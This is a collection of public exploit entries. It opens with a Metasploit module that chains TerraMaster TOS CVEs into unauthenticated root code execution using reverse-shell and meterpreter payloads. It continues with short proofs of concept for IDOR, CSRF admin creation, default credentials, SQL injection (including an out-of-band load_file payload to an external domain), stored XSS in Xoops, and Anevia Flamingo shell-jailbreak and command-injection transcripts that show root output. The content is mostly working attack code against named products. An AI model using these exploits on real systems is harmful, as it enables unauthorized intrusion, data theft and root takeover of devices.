<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'digest/md5'<br />require 'time'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS 4.2.29<br /> and lower by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information"<br /> and CVE-2022-24989, "Authenticated remote code execution".<br /> Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password<br /> hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint<br /> `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to execute remote code as root<br /> on TerraMaster NAS devices.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor<br /> 'Octagon Networks', # Discovery<br /> '0xf4n9x' # POC<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-24990'],<br /> ['CVE', '2022-24989'],<br /> ['URL', 'https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/'],<br /> ['URL', 'https://github.com/0xf4n9x/CVE-2022-24990'],<br /> ['URL', 'https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990']<br /> ],<br /> 'DisclosureDate' => '2022-03-07',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => ['bourne', 'wget', 'curl'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8181,<br /> 'SSL' => false<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/'])<br /> ])<br /> end<br /><br /> def get_data<br /> # Initialise variable data to store the leaked data<br /> @data = {}<br /><br /> # Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`<br /> # CVE-2022-24990<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/webNasIPS'),<br /> 'headers' => {<br /> 'User-Agent' => 'TNAS'<br /> }<br /> })<br /> if res && res.code == 200 && res.body.include?('webNasIPS successful')<br /> # Parse the JSON response and get the data such as admin password hash and MAC address<br /> res_json = res.get_json_document<br /> unless res_json.blank?<br /> @data['password'] = res_json['data'].split('PWD:')[1].split('SAT')[0].strip<br /> @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip<br /> @data['key'] = @data['mac'][6..11] # last three MAC address entries<br /> @data['timestamp'] = Time.new.to_i.to_s<br /> # derive signature<br /> @data['signature'] = tos_encrypt_str(@data['key'], @data['timestamp'])<br /> end<br /> end<br /> end<br /><br /> def tos_encrypt_str(key, str_to_encrypt)<br /> id = key + str_to_encrypt<br /> return Digest::MD5.hexdigest(id.encode('utf-8'))<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`<br /> # CVE-2022-24989<br /> diskstring = Rex::Text.rand_text_alpha_upper(4..8)<br /><br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/createRaid'),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'headers' => {<br /> 'User-Agent' => 'TNAS',<br /> 'Authorization' => @data['password'],<br /> 'Signature' => @data['signature'],<br /> 'Timestamp' => @data['timestamp']<br /> },<br /> 'vars_post' => {<br /> 'raidtype' => ';' + cmd,<br /> 'diskstring' => diskstring.to_s<br /> }<br /> })<br /> end<br /><br /> def get_terramaster_info<br /> # get Terramaster CPU architecture (X64 or ARM64) and TOS version<br /> @terramaster = {}<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'tos', 'index.php?user/login')<br /> })<br /><br /> if res && res.body && res.code == 200<br /> # get the version information from the request response like below:<br /> # <link href="./static/style/bootstrap.css?ver=TOS3_A1.0_4.2.07" rel="stylesheet"/><br /> return if res.body.match(/ver=.+?"/).nil?<br /><br /> version = res.body.match(/ver=.+?"/)[0]<br /> # check if architecture is ARM64 or X64<br /> if version.match(/_A/)<br /> @terramaster['cpu_arch'] = 'ARM64'<br /> elsif version.match(/_S/) || version.match(/_Q/)<br /> @terramaster['cpu_arch'] = 'X64'<br /> else<br /> @terramaster['cpu_arch'] = 'UNKNOWN'<br /> end<br /><br /> # strip TOS version number and remove trailing double quote.<br /> @terramaster['tos_version'] = version.split('.0_')[1].chop<br /> end<br /> end<br /><br /> def check<br /> get_terramaster_info<br /> return CheckCode::Safe if @terramaster.empty?<br /><br /> if Rex::Version.new(@terramaster['tos_version']) <= Rex::Version.new('4.2.29')<br /> return CheckCode::Vulnerable("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")<br /> end<br /><br /> CheckCode::Safe("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")<br /> end<br /><br /> def exploit<br /> get_data<br /> fail_with(Failure::BadConfig, 'Can not retrieve the leaked data.') if @data.empty?<br /><br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> # Don't check the response here since the server won't respond<br /> # if the payload is successfully executed.<br /> execute_cmdstager(linemax: 65536)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ProLogin V1.9 Insecure Direct Object Reference Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169 | <br />| # Dork : "Login - ProLogin" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /index.php/user_settings<br /><br />[-] When you add value (user_settings) after the index.php/, <br /> an error page appears At the same time, it shows you the panel & limited control .<br /><br />[+] http://127.0.0.1/support.ihorizon.sa/index.php/user_settings<br /><br /><br />Greetings to :=============================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*|<br />===========================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Piyanas v0.1 User Login Page CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://www.piyanassystem.com/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] infected file : /add_user.php<br /><br />[+] Use Payload : /admin/add_user.php<br /><br />[+] http://127.0.0.1/piyanassystemcom/piyanasmember/admin/add_user.php<br /><br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : phpAnalyzer v2.0.4 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : https://codecanyon.net/item/phpanalyzer-instagram-audit-report-tool/21933992 | <br />| # Dork : "Copyright © phpAnalyzer.com. All rights reserved. Product by AltumCode" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use user & pass : admin<br /><br />[+] http://127.0.0.1/phpAnalyzer/admin<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : EasyAnswer version 1.0.1 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.1(64-bit) | <br />| # Vendor : https://www.codester.com/items/40311/ | <br />| # Dork : "© 2022 Easy Answer All rights reserved." |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] infected file: admins-create.php<br /><br />[+] Inside folder /admin/admins-create.php<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Copy the code below and paste it into an HTML file.<br /><br />[+] Go to the line 17.<br /><br />[+] Set the target site link Save changes and apply . <br /><br /> </i>Create Administrator</h2><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /> <br /> <div class="row"><br /> <div class="col-md-12 stretch-card"><br /> <div class="card"><br /> <br /> <div class="card-body"><br /> <br /> <div id="messages"><br /> </div><br /> <br /> <form action="http://CHANGE_TARGET.com/admin/admins-create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data"><br /> <input type="hidden" id="submitform" name="submitform" value="1"><br /> <br /> <div class="form-group row"><br /> <label for="username" class="col-sm-2 col-form-label">Username:</label><br /> <div class="col-sm-12"><br /> <input type="text" class="form-control" id="username" name="username" value="" placeholder="ADMIN USERNAME"><br /> </div><br /> </div><br /> <div class="form-group row"><br /> <label for="password" class="col-sm-2 col-form-label">Password:</label><br /> <div class="col-sm-12"><br /> <input type="password" class="form-control" id="password" name="password" value="" placeholder="ADMIN PASSWORD"><br /> </div><br /> </div><br /> <br /> <div class="form-group row"><br /> <label for="email" class="col-sm-2 col-form-label">E-Mail:</label><br /> <div class="col-sm-12"><br /> <input type="email" class="form-control" id="email" name="email" value="" placeholder="ADMIN E-MAIL ADDRESS"><br /> </div><br /> </div><br /> <br /> <div class="row-spaces"></div><br /> <br /> <p><br /> <button type="button" class="btn btn-primary btn-col-light me-2" onclick="document.main_form.submit();" style=""><span>Submit</span></button><br /> </p><br /> </form><br /> <br /> <br /> </div><br /> </div><br /> </div><br /> </div><br /> <br /> </div><br /> <br />Greetings to :===================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet| <br />==================================================================================================<br /></code></pre>
<pre><code>## Title: OTAS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 06.12.2023<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The password parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'<br />was submitted in the password parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain. The application interacted with that domain, indicating that<br />the injected SQL query was executed. The attacker can dump all<br />information from the<br />database of this system, and then he can use it for dangerous and<br />malicious purposes!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: password (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')<br />OR NOT 1404=1404-- Eotr<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')<br />AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT<br />(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')<br />AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)<br /><br />## Time spend:<br />01:15:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Xoops CMS Version 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 2023-06-12<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://xoops.org/<br /># Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10<br /># Version: 2.5.10<br /># Tested : https://www.softaculous.com/apps/cms/Xoops<br /><br /><br />--- Description ---<br /><br />1) Login admin panel and click Image Manager , choose Add Category : <br />https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images<br />2) Write your payload in the Category Name field and submit:<br />Payload: <script>alert(1)</script><br />3) After click multiupload , when you move the mouse to the payload name, you will see the alert button<br />https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2<br /><br /><br /></code></pre>
<pre><code><br />Anevia Flamingo XL 3.2.9 (login) Remote Root Jailbreak<br /><br /><br />Vendor: Ateme<br />Product web page: https://www.ateme.com<br />Affected version: 3.2.9<br /> Hardware revision 1.0<br /> SoapLive 2.0.3<br /><br />Summary: Flamingo XL, a new modular and high-density IPTV head-end<br />product for hospitality and corporate markets. Flamingo XL captures<br />live TV and radio content from satellite, cable, digital terrestrial<br />and analog sources before streaming it over IP networks to STBs, PCs<br />or other IP-connected devices. The Flamingo XL is based upon a modular<br />4U rack hardware platform that allows hospitality and corporate video<br />service providers to deliver a mix of channels from various sources<br />over internal IP networks.<br /><br />Desc: Once the admin establishes a secure shell session, she gets<br />dropped into a sandboxed environment using the login binary that<br />allows specific set of commands. One of those commands that can be<br />exploited to escape the jailed shell is traceroute. A remote attacker<br />can breakout of the restricted environment and have full root access<br />to the device.<br /><br />Tested on: GNU/Linux 3.1.4 (x86_64)<br /> Apache/2.2.15 (Unix)<br /> mod_ssl/2.2.15<br /> OpenSSL/0.9.8g<br /> DAV/2<br /> PHP/5.3.6<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5780<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php<br /><br /><br />13.04.2023<br /><br />--<br /><br /><br />$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1<br />The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.<br />RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.<br />Are you sure you want to continue connecting (yes/no/[fingerprint])? yes<br />Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.<br />Anevia Flamingo XL<br />root@192.168.1.1's password:<br />Primary-XL> help<br />available commands:<br /> bonding<br /> config<br /> date<br /> dns<br /> enable<br /> ethconfig<br /> exit<br /> exp<br /> firewall<br /> help<br /> hostname<br /> http<br /> igmpq<br /> imp<br /> ipconfig<br /> license<br /> log<br /> mail<br /> passwd<br /> persistent_logs<br /> ping<br /> reboot<br /> reset<br /> route<br /> serial<br /> settings<br /> sslconfig<br /> tcpdump<br /> timezone<br /> traceroute<br /> upgrade<br /> uptime<br /> version<br /> vlanconfig<br /><br />Primary-XL> tcpdump ;id<br />tcpdump: illegal token: ;<br />Primary-XL> id<br />unknown command id<br />Primary-XL> whoami<br />unknown command whoami<br />Primary-XL> ping ;id<br />ping: ;id: Host name lookup failure<br />Primary-XL> traceroute ;id<br />BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary<br /><br />Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]<br /> [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]<br /> [-z pausemsecs] host [data size]<br /><br />trace the route ip packets follow going to "host"<br />Options:<br /> -F Set the don't fragment bit<br /> -I Use ICMP ECHO instead of UDP datagrams<br /> -l Display the ttl value of the returned packet<br /> -d Set SO_DEBUG options to socket<br /> -n Print hop addresses numerically rather than symbolically<br /> -r Bypass the normal routing tables and send directly to a host<br /> -v Verbose output<br /> -m max_ttl Set the max time-to-live (max number of hops)<br /> -p port# Set the base UDP port number used in probes<br /> (default is 33434)<br /> -q nqueries Set the number of probes per ``ttl'' to nqueries<br /> (default is 3)<br /> -s src_addr Use the following IP address as the source address<br /> -t tos Set the type-of-service in probe packets to the following value<br /> (default 0)<br /> -w wait Set the time (in seconds) to wait for a response to a probe<br /> (default 3 sec)<br /> -g Specify a loose source route gateway (8 maximum)<br /><br />uid=0(root) gid=0(root) groups=0(root)<br />Primary-XL> version<br />Software Revision: Anevia Flamingo XL v3.2.9<br />Hardware Revision: 1.0<br />(c) Anevia 2003-2012<br />Primary-XL> traceroute ;sh<br />...<br />...<br />whoami<br />root<br />id<br />uid=0(root) gid=0(root) groups=0(root)<br />ls -al<br />drwxr-xr-x 19 root root 1024 Oct 3 2022 .<br />drwxr-xr-x 19 root root 1024 Oct 3 2022 ..<br />drwxr-xr-x 2 root root 1024 Oct 21 2013 bin<br />drwxrwxrwt 2 root root 40 Oct 3 2022 cores<br />drwxr-xr-x 13 root root 27648 May 22 00:53 dev<br />drwxr-xr-x 3 root root 1024 Oct 21 2013 emul<br />drwxr-xr-x 48 1000 1000 3072 Oct 3 2022 etc<br />drwxr-xr-x 3 root root 1024 Oct 3 2022 home<br />drwxr-xr-x 11 root root 3072 Oct 21 2013 lib<br />lrwxrwxrwx 1 root root 20 Oct 21 2013 lib32 -> /emul/ia32-linux/lib<br />lrwxrwxrwx 1 root root 3 Oct 21 2013 lib64 -> lib<br />drwx------ 2 root root 12288 Oct 21 2013 lost+found<br />drwxr-xr-x 4 root root 1024 Oct 21 2013 mnt<br />drwxrwxrwt 2 root root 80 May 22 00:45 php_sessions<br />dr-xr-xr-x 177 root root 0 Oct 3 2022 proc<br />drwxr-xr-x 4 root root 1024 Oct 21 2013 root<br />drwxr-xr-x 2 root root 2048 Oct 21 2013 sbin<br />drwxr-xr-x 12 root root 0 Oct 3 2022 sys<br />drwxrwxrwt 26 root root 1140 May 22 01:06 tmp<br />drwxr-xr-x 10 1000 1000 1024 Oct 21 2013 usr<br />drwxr-xr-x 14 root root 1024 Oct 21 2013 var<br /><br />ls /var/www/admin<br />_img configuration.php log_securemedia.php stream_dump.php<br />_lang cores_and_logs_management.php login.php stream_services<br />_lib dataminer_handshake.php logout.php streaming.php<br />_style dvbt.php logs.php support.php<br />about.php dvbt_scan.php main.php template<br />ajax export.php manager.php time.php<br />alarm.php fileprogress.php network.php toto.ts<br />alarm_view.php firewall.php pear upload_helper.php<br />authentication.php get_config power.php uptime.php<br />bridges.php get_enquiry_pending.php read_settings.php usbloader.php<br />cam.php get_upgrade_error.php receive_helper.php version.php<br />channel.php heartbeat.php rescrambling webradio.php<br />channel_xl_list.php include rescrambling.php webtv<br />check_state input.php resilience webtv.php<br />class js resilience.php xmltv.php<br />common license.php restart_service.php<br />config_snmp.php log.php set_oem.php<br /><br />python -c 'import pty; pty.spawn("/bin/bash")'<br />root@Primary-XL:/# cd /usr/local/bin<br />root@Primary-XL:/usr/local/bin# ls -al login<br />-rwxr-xr-x 1 root root 35896 Feb 21 2012 login<br />root@Primary-XL:/usr/local/bin# cd ..<br />root@Primary-XL:/usr/local# ls commands/<br />bonding firewall mail timezone<br />config help passwd traceroute<br />date hostname persistent_logs upgrade<br />dbg-serial http ping uptime<br />dbg-set-oem igmpq route version<br />dbg-updates-log imp serial vlanconfig<br />dns ipconfig settings<br />ethconfig license sslconfig<br />exp log tcpdump<br />root@Primary-XL:/usr/local# exit<br />exit<br />Primary-XL> enable<br />password:<br />Primary-XL# ;]<br /></code></pre>
<pre><code><br />Anevia Flamingo XL 3.6.20 Authenticated Root Remote Code Execution<br /><br /><br />Vendor: Ateme<br />Product web page: https://www.ateme.com<br />Affected version: 3.6.20, 3.2.9<br /> Hardware revision 1.1, 1.0<br /> SoapLive 2.4.1, 2.0.3<br /> SoapSystem 1.3.1<br /><br />Summary: Flamingo XL, a new modular and high-density IPTV head-end<br />product for hospitality and corporate markets. Flamingo XL captures<br />live TV and radio content from satellite, cable, digital terrestrial<br />and analog sources before streaming it over IP networks to STBs, PCs<br />or other IP-connected devices. The Flamingo XL is based upon a modular<br />4U rack hardware platform that allows hospitality and corporate video<br />service providers to deliver a mix of channels from various sources<br />over internal IP networks.<br /><br />Desc: The affected device suffers from authenticated remote code<br />execution vulnerability. A remote attacker can exploit this issue<br />and execute arbitrary system commands granting her system access<br />with root privileges.<br /><br />Tested on: GNU/Linux 3.1.4 (x86_64)<br /> Apache/2.2.15 (Unix)<br /> mod_ssl/2.2.15<br /> OpenSSL/0.9.8g<br /> DAV/2<br /> PHP/5.3.6<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5779<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php<br /><br /><br />13.04.2023<br /><br />--<br /><br /><br />> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root<br /> % Total % Received % Xferd Average Speed Time Time Time Current<br /> Dload Upload Total Spent Left Speed<br /> 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.1.1:80...<br />* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)<br />> POST /admin/time.php HTTP/1.1<br />> Host: 192.168.1.1<br />> User-Agent: curl/8.0.1<br />> Accept: */*<br />> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4<br />> Content-Length: 32<br />> Content-Type: application/x-www-form-urlencoded<br />><br />} [32 bytes data]<br />100 32 0 0 100 32 0 25 0:00:01 0:00:01 --:--:-- 25< HTTP/1.1 302 Found<br />< Date: Thu, 13 Apr 2023 23:54:15 GMT<br />< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6<br />< X-Powered-By: PHP/5.3.6<br />< Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />< Pragma: no-cache<br />* Please rewind output before next send<br />< Location: /admin/time.php<br />< Transfer-Encoding: chunked<br />< Content-Type: text/html<br /><<br />* Ignoring the response-body<br />{ [5 bytes data]<br />100 32 0 0 100 32 0 19 0:00:01 0:00:01 --:--:-- 19<br />* Connection #0 to host 192.168.1.1 left intact<br />* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'<br />* Switch from POST to GET<br />* Found bundle for host: 0x1de6c6321b0 [serially]<br />* Re-using existing connection #0 with host 192.168.1.1<br />> POST /admin/time.php HTTP/1.1<br />> Host: 192.168.1.1<br />> User-Agent: curl/8.0.1<br />> Accept: */*<br />> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4<br />><br />< HTTP/1.1 200 OK<br />< Date: Thu, 13 Apr 2023 23:54:17 GMT<br />< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6<br />< X-Powered-By: PHP/5.3.6<br />< Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />< Pragma: no-cache<br />< Transfer-Encoding: chunked<br />< Content-Type: text/html<br /><<br />{ [13853 bytes data]<br />14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br /> <----------------------<<<br />14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br /> <----------------------<<<br />100 33896 0 33896 0 0 14891 0 --:--:-- 0:00:02 --:--:-- 99k<br />* Connection #0 to host 192.168.1.1 left intact<br /></code></pre>
<pre><code><br />Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code Execution<br /><br /><br />Vendor: Ateme<br />Product web page: https://www.ateme.com<br />Affected version: 3.6.5<br /> Hardware revision: 1.1<br /> SoapLive 2.4.0<br /> SoapSystem 1.3.1<br /><br />Summary: Flamingo XL, a new modular and high-density IPTV head-end<br />product for hospitality and corporate markets. Flamingo XL captures<br />live TV and radio content from satellite, cable, digital terrestrial<br />and analog sources before streaming it over IP networks to STBs, PCs<br />or other IP-connected devices. The Flamingo XL is based upon a modular<br />4U rack hardware platform that allows hospitality and corporate video<br />service providers to deliver a mix of channels from various sources<br />over internal IP networks.<br /><br />Desc: The affected device suffers from authenticated remote code<br />execution vulnerability. A remote attacker can exploit this issue<br />and execute arbitrary system commands granting her system access<br />with root privileges.<br /><br />Tested on: GNU/Linux 3.14.29 (x86_64)<br /> Apache/2.2.22 (Debian)<br /> PHP/5.6.0-0anevia2<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5778<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php<br /><br /><br />13.04.2023<br /><br />--<br /><br /><br />$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data<br /> <td>uid=33(www-data)</td><br /> <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/><br /> <td>gid=33(www-data)</td><br /> <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/><br /> <td>groups=33(www-data),6(disk),25(floppy)</td><br /> <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/><br /><br /><br />---<br /><br /><br />$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root<br /> <td>uid=0(root)</td><br /> <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/><br /> <td>gid=0(root)</td><br /> <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/><br /> <td>groups=0(root)</td><br /> <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/><br /></code></pre>